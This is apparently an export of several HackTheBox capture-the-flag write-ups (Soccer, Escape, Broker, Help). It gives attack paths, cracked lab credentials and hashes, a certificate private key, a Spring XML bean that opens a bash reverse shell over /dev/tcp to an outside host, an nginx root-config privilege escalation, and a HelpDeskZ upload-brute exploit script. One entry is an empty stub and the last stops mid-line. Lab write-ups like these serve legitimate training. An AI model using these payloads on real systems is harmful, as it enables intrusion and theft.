SF:Cannot\\x20OPTIONS\\x20/\u0026lt;/pre\u0026gt;\\n\u0026lt;/body\u0026gt;\\n\u0026lt;/html\u0026gt;\\n\u0026#34;)%r(RTSPRequest,16C,\u0026#34;H SF:TTP/1\\.1\\x20404\\x20Not\\x20Found\\r\\nContent-Security-Policy:\\x20default- SF:src\\x20\u0026#39;none\u0026#39;\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nContent-Type:\\x2 SF:0text/html;\\x20charset=utf-8\\r\\nContent-Length:\\x20143\\r\\nDate:\\x20Tue, SF:\\x2030\\x20Dec\\x202025\\x2016:39:08\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\ SF:n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\u0026lt;meta\\x20charset=\\\u0026#34; SF:utf-8\\\u0026#34;\u0026gt;\\n\u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt;\\n\u0026lt;/head\u0026gt;\\n\u0026lt;body\u0026gt;\\n\u0026lt;pre\u0026gt;Cannot\\x20OPTIONS SF:\\x20/\u0026lt;/pre\u0026gt;\\n\u0026lt;/body\u0026gt;\\n\u0026lt;/html\u0026gt;\\n\u0026#34;)%r(RPCCheck,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Ba SF:d\\x20Request\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;)%r(DNSVersionBindReqTCP,2 SF:F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;) SF:%r(DNSStatusRequestTCP,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnec SF:tion:\\x20close\\r\\n\\r\\n\u0026#34;)%r(Help,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\ SF:r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;)%r(SSLSessionReq,2F,\u0026#34;HTTP/1\\.1\\x20400\\ SF:x20Bad\\x20Request\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;); Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1025/tcp) HOP RTT ADDRESS 1 184.28 ms 10.10.14.1 2 188.50 ms 
10.129.18.173 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.08 seconds\nFound the Tiny File Manager instance with dirbuster.\nVulnerabilities # Tiny File Manager\nExploitation # The default creds admin/admin@123 worked.\nIt looks like uploaded files are saved to this path.\nhttps://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/\nUploading straight away fails with an error saying we are not allowed to write to the specified folder.\nFollowing the blog above, let us try path traversal in the upload destination.\nRequesting a nonsense URL produces an error that leaks the path where the files are stored:\n/var/www/html/tiny/tinyfilemanager.php\nWith that we were able to upload into the /uploads/ directory, and browsing to the file gives us our PHP shell.\nWe find the user player, but we do not have permission to read the flag.\nLet us look around the box.\nAfter discovering the vhost soc-player.soccer.htb in the nginx sites-enabled directory, we add it to /etc/hosts and get this page.\nRight off the bat I notice the menu bar.\nThere is a login portal.\nUnder Check there is a ticket lookup.\nIt looks like the ticket ID is checked against a backend database for validity, so let us try some SQL payloads.\nThe lookup is vulnerable to boolean-based blind SQLi, so we run sqlmap against it and dump the creds for player.\nNow we SSH in as player.\n","date":"30 December 2025","externalUrl":null,"permalink":"/ctf-writeups/soccer/","section":"CTF Writeups","summary":"","title":"Soccer","type":"ctf-writeups"},{"content":" [AD] Escape # Overview # OS: Windows IP: 10.129.228.253 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got access via leaked user creds, captured the NetNTLMv2 hash of the SQL service account by coercing it to authenticate to us, and escalated with a vulnerable certificate template.\nLoot # Possible usernames: Brandon, Tom, Ryan\nCredentials PublicUser:GuestUserCantWrite1\nsequel\\sql_svc:REGGIE1234ronnie\nsequel.htb\\Ryan.Cooper:NuclearMosquito3\nadministrator NT hash: A52F78E4C751E5F5E17E1E9F3E58F4EE\nEnumeration # nmap Starting 
Nmap 7.95 ( https://nmap.org ) at 2025-12-25 13:36 EST Nmap scan report for 10.129.228.253 Host is up (0.19s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-26 02:37:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-12-26T02:38:45+00:00; +7h59m59s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-12-26T02:38:45+00:00; +8h00m00s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.129.228.253:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-12-26T02:28:16 |_Not valid after: 2055-12-26T02:28:16 | ms-sql-ntlm-info: | 10.129.228.253:1433: | Target_Name: sequel | NetBIOS_Domain_Name: sequel | NetBIOS_Computer_Name: DC | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: dc.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2025-12-26T02:38:45+00:00; +7h59m59s from scanner time. 
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-12-26T02:38:45+00:00; +7h59m59s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-12-26T02:38:45+00:00; +8h00m00s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-12-26T02:38:04 |_ start_date: N/A |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 192.44 ms 10.10.14.1 2 192.55 ms 10.129.228.253 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 109.19 seconds ssl Connecting to 10.129.228.253 CONNECTED(00000003) depth=0 verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 verify error:num=21:unable to verify the first certificate verify return:1 depth=0 verify return:1 Certificate chain 0 s: i:DC=htb, DC=sequel, CN=sequel-DC-CA a:PKEY: RSA, 2048 (bit); sigalg: sha256WithRSAEncryption v:NotBefore: Jan 18 23:03:57 2024 GMT; NotAfter: Jan 5 23:03:57 2074 GMT Server certificate -----BEGIN CERTIFICATE----- MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwIBcNMjQwMTE4MjMwMzU3WhgPMjA3NDAx MDUyMzAzNTdaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvfUDG vZbf6oLv67FXEoeqi+VUDMwFcCWGOpwAlEvMCRhMa2Jqx6nVSl+7URU0rF43c58A kAFbwX9E5B4Me4ZDkqkHV5nBBkHEPdDP4ZlYsjAmVrz7bHAzp3coDgF9UKv9S4j8 g9P8MPaOdxTRR6dwkhVWdIDvIevjeg7oWTawG7MFEX4b7BEwL/uNRYZtyFHrfmzP BL5MovrBbZzU4AnggnvpeiLNdenK9Xcp2IIDr8A7h7uFuQ+3pCbXL9El/vEgzxAj rsUhf2e6nxNAWrNZSFXLHREt9uFkhTWU26Zoa675Vjq0XNy7J+rXAZiU5q3eD4Kq /SiN+ZDAwWJ22XGJAgMBAAGjggK8MIICuDA4BgkrBgEEAYI3FQcEKzApBiErBgEE AYI3FQiHq/N2hdymVof9lTWDv8NZg4nKNYF3ASECAW4CAQIwMgYDVR0lBCswKQYI KwYBBQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICBgcrBgEFAgMFMA4GA1UdDwEB /wQEAwIFoDBABgkrBgEEAYI3FQoEMzAxMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMB MAwGCisGAQQBgjcUAgIwCQYHKwYBBQIDBTAdBgNVHQ4EFgQUCVbgZp4lOmGws1z7 bP3InfTiHiMwHwYDVR0jBBgwFoAUYp8yo6DwOCDUYMDNbcX6UTBewxUwgcQGA1Ud HwSBvDCBuTCBtqCBs6CBsIaBrWxkYXA6Ly8vQ049c2VxdWVsLURDLUNBLENOPWRj LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD Tj1Db25maWd1cmF0aW9uLERDPXNlcXVlbCxEQz1odGI/Y2VydGlmaWNhdGVSZXZv Y2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50 MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NOPXNl cXVlbC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049 U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NBQ2Vy 
dGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5 MC8GA1UdEQEB/wQlMCOCDWRjLnNlcXVlbC5odGKCCnNlcXVlbC5odGKCBnNlcXVl bDANBgkqhkiG9w0BAQsFAAOCAQEAK2aJVbODF+3XQ85GflrcPthxILDslZoJff13 ULw9IQRwFbr5wV/usQR8WXfp4FGWB7g6F3w4vOo8Wnm0eTcQM+N2Ry3aEWiv9SG8 /Vk18Z1sSU2hzlTdZbVJWgZwCyPvYoV02uPkP12f+Z9groRTtOEBq0AgdMDc5hZ/ A8Ikn9UuctvkX6qgw+ofyVveIqsE0GL6DCDGw6iUmXIgVJk5fgQnfyQquqnmhVnA 8NoXXuh0ioTHmCqYrdtIcB8KC4nS70p3ef2F2fTNejqtw46M04VZQw/67Y+83hI5 I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw== -----END CERTIFICATE----- subject= issuer=DC=htb, DC=sequel, CN=sequel-DC-CA No client certificate CA names sent Client Certificate Types: RSA sign, DSA sign, ECDSA sign Requested Signature Algorithms: RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512 Shared Requested Signature Algorithms: RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512 Peer signing digest: SHA256 Peer signature type: rsa_pkcs1_sha256 Peer Temp Key: ECDH, secp384r1, 384 bits SSL handshake has read 1979 bytes and written 1849 bytes Verification error: unable to verify the first certificate New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384 Protocol: TLSv1.2 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE No ALPN negotiated SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-RSA-AES256-GCM-SHA384 Session-ID: 4D2800008BDCD71818F7B113163933B092C8E59CAB994B5994CE3EA667FE9534 Session-ID-ctx: Master-Key: 795202876F2CD0C474ACB69F447AE7D1E481E249E96F7313C6E3AC60A5D7E31066A0410CDB79416BE5D7CC1822DD6F2E PSK identity: None PSK identity hint: None SRP username: None Start Time: 1766689379 Timeout : 7200 (sec) Verify return code: 21 (unable to verify the first certificate) Extended master secret: yes smb SQL server Let us coerce the SQL service into authenticating to an SMB listener we control: the NetNTLMv2 response it sends carries the identity of the service account and can be cracked offline.\nWe 
capture this:\n[+] Listening for events... [SMB] NTLMv2-SSP Client : 10.129.228.253 [SMB] NTLMv2-SSP Username : sequel\\sql_svc [SMB] NTLMv2-SSP Hash : sql_svc::sequel:b7114adaff3f...\nCracking it with hashcat (-m 5600, NetNTLMv2) gives the sql_svc password REGGIE1234ronnie.\nVulnerabilities # Exploitation # Now that we have the creds of the account running the SQL service, let us try to get in with evil-winrm.\nIn the SQLServer directory we find the password of Ryan.Cooper.\nLet us log in with those creds and grab the user flag.\nPriv-Esc # Start by collecting BloodHound data.\nNext, check the AppLocker policies.\nNo rules are enforced, and we are allowed to create a new machine account.\nI do not think we can dump creds from here.\nWhat about the usual privesc checks? Nothing useful.\nLet us check Certify.\nCertify reports the UserAuthentication template as vulnerable (ESC1: the enrollee supplies the subject alternative name and the template allows client authentication, so we can request a certificate for any user, including administrator).\nRequest the cert (Certify renamed here to cert.exe):\n./cert.exe request /ca:dc.sequel.htb\\sequel-DC-CA /template:UserAuthentication /altname:administrator\n[*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmsMuQLppjYVgw4//mpj/P/Q+0iISV1slIWtyn2pg+dtyU3NE gSYqlvxcy68tOFbT38N4iFRaeLjYgyYZncKxhkIMbUThTCMOMdQm87mNdPwuP5NB NZdP7TinW3Yj61ahN8c61XxzNr6kjVo2440wjVpFCFkChbyi3E0Xd2YeqQ4bhwqi m6CNn+RzpUgw5+nE5DsCTyY/jC80ak2BheI7Dj1PACsEKKumVqU1ILn+gjpRSZvs zD/BZMg6nbmrNhe88r/ws4ToyLQqGUCNx0tey37MVrToN4pELJ44CjJf16g9qvwR qEcm6VZacro+Xa5ZMqmJo74MVsYsZT5AP/0uLQIDAQABAoIBADluz35j74H+im9o xAGaX7dbK+kNjeLvRzNEza/NaZmvz5iagUSwZkPL+Z/5LX3n8w7qWpO1QjHk3yyk egMq2nipkDUIx9dadw0U3zO5m35bi8o6GowJ0DaHvMvbZu8SIhgyDmplmdgqHaT7 Yr1Fi0wZwN6dMatx2rqIvXmo4x33M4l+7o/b7JHMTNj4xzoO1u10mvK6pxXYp0j2 PWxJA2einj231nDt0CQZUr4BxUnIbbY1pw4CbvSjS1cs3cPUOWagrWUvI+hOdZmV T25dsGd0BJX1DWtbjyJndnj8bMgsu5Z/0bNt/xnfmYxnh74LhXhm7wFwyKh3tEMA xw//4N0CgYEAy0HUvkApkB49269QXe57ubP9xP9ZQglaxKnMCWmkiyLgy2K9EWIN fpHoDa0p/GIfkNoPT/4TL1wY37MbMlPrMjk/Z8q9+mhsCOeAwfxAd3GZz8zGbV18 tQzQfJjaZqRcL+kuOVGXh0p16HuP2ysDEBlaNrRPjgs4PY3pH1VKk/MCgYEAwuvk ufCvZNo86t7N9elVyB1JehL50mxhgMbAqZum9bWt3ASwBIOxCb01Pt43RaHxuiUj 
Ub+01sG00XxQ7bwJ8N6NaGAPr2JviiBchAqmNHu7Em7SGSAKL4SdQFPJvVgJmzjz 6kL2tbHbqXfq11hRQJLeeMA29+CAnCyHU2lrXV8CgYAHQqm7xgT2De59u2xufodS 4dgNwmVI05a3ca1FJM3o3m0TNsq0JUGAJOwaGPZn+oVQIknrvJKo3WxSCU7OZGsB V0Qpi/dvS22Yf9R8mWsgGSG6Z4ErBOzgdr23xan/gp18ZKLvDzgPcBx4GnnQBWBN oeo0DArPcx0mLbyHDv/j+wKBgArLHy5AqqWuBAOJdOQyGILtRD1TQawqPjfwSYja yqL+fXMae1i0piAA7yrdCTh84DLLjaogMHZX4ZhcBuszJ2XEHRZzg0rV65E9e4IA SPXNCC3cHxwvDwFUmZSPTzOB5X5H6BHHxXuILr6ymjl0dYNa3qDXG/Qb5WNAf/nZ c42HAoGAL3lc7J4mSTf47W0y/PI7WSqrjYVxUKUDL8+x+jjoB2mRZtgKH2PEklI7 5C2dnQ2BE/e/LJVkUfgs2i3Q/qmR6pMO6pnevV4DV8NwU7OKWZ8zWwj4KEDVR/Sq 3ZuP4nvrBEPW1JPD7w/AXrNl7R4NaEt0VOJemoPUZxd2Rwo7vS8= -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGEjCCBPqgAwIBAgITHgAAAA7IG3/8jzhppQAAAAAADjANBgkqhkiG9w0BAQsF ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjUxMjI2MjM1NjUxWhcNMzUxMjI0 MjM1NjUxWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCawy5AummNhWDDj/+amP8/9D7S IhJXWyUha3KfamD523JTc0SBJiqW/FzLry04VtPfw3iIVFp4uNiDJhmdwrGGQgxt ROFMIw4x1CbzuY10/C4/k0E1l0/tOKdbdiPrVqE3xzrVfHM2vqSNWjbjjTCNWkUI WQKFvKLcTRd3Zh6pDhuHCqKboI2f5HOlSDDn6cTkOwJPJj+MLzRqTYGF4jsOPU8A KwQoq6ZWpTUguf6COlFJm+zMP8FkyDqduas2F7zyv/CzhOjItCoZQI3HS17LfsxW tOg3ikQsnjgKMl/XqD2q/BGoRybpVlpyuj5drlkyqYmjvgxWxixlPkA//S4tAgMB AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9 lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIVI3t82owCTX23c+/KlYh3gML5r MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi 
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049 QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/ b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF AAOCAQEASsm0sZtW1s0P3jLMuFrW8UxwrES9hH8GLDNT6vs05PyU9Ib84nW3BmYy YigNZaH4erDi4QU6yniPlj8n/SMEXvKT3vntsswDvMZoX4IzX6qw1uHUDsNNxY+7 9tgtnnhtueuQoqfif0d9xmSezrAj5Ovk7ohYUzwessK6Ldy5uSEesrscGKMllIiv 3vn8i0Vv0/CJdFmp6u5dofGEs9WQr80JfrRxJ3ih+Ne6fdaHfoxLXDHbqmj/o4XM v0zY6YoBKhfNzz1/CUg8QZjZTlHfFZWJh6u67//h3V05bUsGmHl4F82QgLjixL1k hQA5BYlWSgdWM6ChUN2gRCoXF1VPTQ== -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP \u0026#34;Microsoft Enhanced Cryptographic Provider v1.0\u0026#34; -export -out cert.pfx\nAfter converting the PEM to a PFX with the openssl command above, we use the certificate to request a TGT as administrator with Rubeus. Adding /getcredentials makes Rubeus also perform U2U and return the NTLM hash of the account:\nEvil-WinRM PS C:\\Users\\Ryan.Cooper\\Documents\u0026gt; .\\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /show /nowrap\nWe get the TGT and the NTLM hash.\nWith that hash we pass-the-hash as administrator and we are in.\n","date":"25 December 2025","externalUrl":null,"permalink":"/ctf-writeups/ad-escape/","section":"CTF Writeups","summary":"","title":"[AD] Escape","type":"ctf-writeups"},{"content":" Broker # Overview # OS: Linux IP: 10.129.230.87 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Gained access with the ActiveMQ OpenWire RCE (CVE-2023-46604), which makes the broker fetch and load an attacker-supplied Spring XML file, then escalated with sudo rights to run nginx with an arbitrary config file.\nEnumeration # nmap scan results\nVisiting the site prompts for credentials; the default admin/admin gets us into the ActiveMQ manager portal.\nLet us install javac with\nsudo apt install 
default-jdk -y\nVulnerabilities # CVE-2023-46604: the broker instantiates a class named by the client in an OpenWire ExceptionResponse without validating it. With ClassPathXmlApplicationContext as the class and a URL as the message, it fetches our Spring XML and creates the beans defined in it.\nExploitation # Grab the exploit:\ngit clone https://github.com/evkl1d/CVE-2023-46604.git\nTo run it we host a Spring XML bean definition that the broker will load; the ProcessBuilder bean below starts our reverse shell.\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34; ?\u0026gt;\n\u0026lt;beans xmlns=\u0026#34;http://www.springframework.org/schema/beans\u0026#34;\n       xmlns:xsi=\u0026#34;http://www.w3.org/2001/XMLSchema-instance\u0026#34;\n       xsi:schemaLocation=\u0026#34;http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd\u0026#34;\u0026gt;\n  \u0026lt;bean id=\u0026#34;pb\u0026#34; class=\u0026#34;java.lang.ProcessBuilder\u0026#34; init-method=\u0026#34;start\u0026#34;\u0026gt;\n    \u0026lt;constructor-arg\u0026gt;\n      \u0026lt;list\u0026gt;\n        \u0026lt;value\u0026gt;bash\u0026lt;/value\u0026gt;\n        \u0026lt;value\u0026gt;-c\u0026lt;/value\u0026gt;\n        \u0026lt;value\u0026gt;bash -i \u0026amp;gt;\u0026amp;amp; /dev/tcp/10.10.10.10/9001 0\u0026amp;gt;\u0026amp;amp;1\u0026lt;/value\u0026gt;\n      \u0026lt;/list\u0026gt;\n    \u0026lt;/constructor-arg\u0026gt;\n  \u0026lt;/bean\u0026gt;\n\u0026lt;/beans\u0026gt;\nWith this we get our reverse shell.\nsudo -l shows we can run /usr/sbin/nginx as root.\nWe abuse that with a malicious config file: nginx starts as root and serves the whole filesystem on port 9001.\nnano /tmp/root.conf\nuser root;\nworker_processes 1;\nevents { worker_connections 1024; }\nhttp {\n  server {\n    listen 9001;\n    location / { root /; }\n  }\n}\nsudo /usr/sbin/nginx -c /tmp/root.conf\nNow the root flag can be fetched from port 9001, e.g. http://10.129.230.87:9001/root/root.txt.\n","date":"20 December 2025","externalUrl":null,"permalink":"/ctf-writeups/broker/","section":"CTF Writeups","summary":"","title":"Broker","type":"ctf-writeups"},{"content":" Intentions # Overview # OS: Linux IP: 10.129.229.27 Difficulty: Hard Platform: HackTheBox OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Intentions, including enumeration, exploitation, and privilege escalation.\nEnumeration # I started 
broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nPort 80\nDirsearch\nVulnerabilities # Exploitation # ","date":"20 December 2025","externalUrl":null,"permalink":"/ctf-writeups/intentions/","section":"CTF Writeups","summary":"","title":"Intentions","type":"ctf-writeups"},{"content":" Help # Overview # OS: Linux IP: 10.129.230.159 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Gained access by uploading a PHP reverse shell as a HelpDeskZ ticket attachment and brute-forcing its renamed filename (the name depends on the upload timestamp, hence the timezone step), then escalated with a kernel exploit suggested by linux-exploit-suggester.\nEnumeration # Nmap results\nPort 3000\nNow that we know port 3000 serves GraphQL, let us enumerate it.\nSet Content-Type: application/json when sending the JSON body.\nhttps://github.com/ivanversluis/pentest-hacktricks/blob/master/pentesting/pentesting-web/graphql.md\nWe take the introspection query from this page:\n{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\nhttps://www.yeswehack.com/learn-bug-bounty/hacking-graphql-endpoints\nIntrospection reveals a User object with username and password fields.\nQuerying the user object gives us the password hash:\n5d3c93182bb20f07b994a7f617e99cff\nLooking it up on ntlm.pw gives the cleartext: godhelpmeplz.\nThe username is helpme@helpme.com.\nThe support site we found with dirsearch runs HelpDeskZ; the version comes from the readme directory we got by brute-forcing.\nVulnerabilities # HelpDeskZ version 1.0.2\nlets get our reverseshell 
in PHP and upload it as a ticket attachment.\nExploitation # The server reports this timezone; we update our preference on the site to match it.\nexploit.py\nNow we can use this code (the public HelpDeskZ 1.0.2 exploit, ported to Python 3):\nimport hashlib\nimport sys\nimport time\n\nimport requests\n\nprint(\u0026#39;Helpdeskz v1.0.2 - Unauthenticated shell upload exploit\u0026#39;)\n\nif len(sys.argv) \u0026lt; 3:\n    print(\u0026#39;Usage: {} [baseUrl] [nameOfUploadedFile]\u0026#39;.format(sys.argv[0]))\n    sys.exit(1)\n\nhelpdeskz_base_url = sys.argv[1]\nfile_name = sys.argv[2]\n\n# HelpDeskZ stores attachments as md5(original filename + upload time).php,\n# so walk back over the last 300 seconds of timestamps. If the server clock\n# is skewed from ours, seed current_time from the HTTP Date header instead.\ncurrent_time = int(time.time())\nfor x in range(0, 300):\n    plaintext = file_name + str(current_time - x)\n    md5hash = hashlib.md5(plaintext.encode()).hexdigest()\n    url = helpdeskz_base_url + \u0026#39;/uploads/tickets/\u0026#39; + md5hash + \u0026#39;.php\u0026#39;\n    response = requests.head(url)\n    if response.status_code == 200:\n        print(\u0026#39;found!\u0026#39;)\n        print(url)\n        sys.exit(0)\n\nprint(\u0026#39;Sorry, I did not find anything\u0026#39;)\nFirst we upload the file on the ticket submission portal and get a \u0026#34;file not allowed\u0026#34; message, but HelpDeskZ has already stored the file by then. Running the exploit finds the renamed PHP file, which gives us a PHP shell, and from it we spawn a Python reverse shell.\nPrivesc # We host a simple Python server with\npython3 -m http.server 80\nand use wget to pull linpeas onto the box.\nIt suggests Dirty COW, which should have been it, but that exploit did not work for our user, so we used another kernel exploit:\nLinux Kernel \u0026lt; 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege 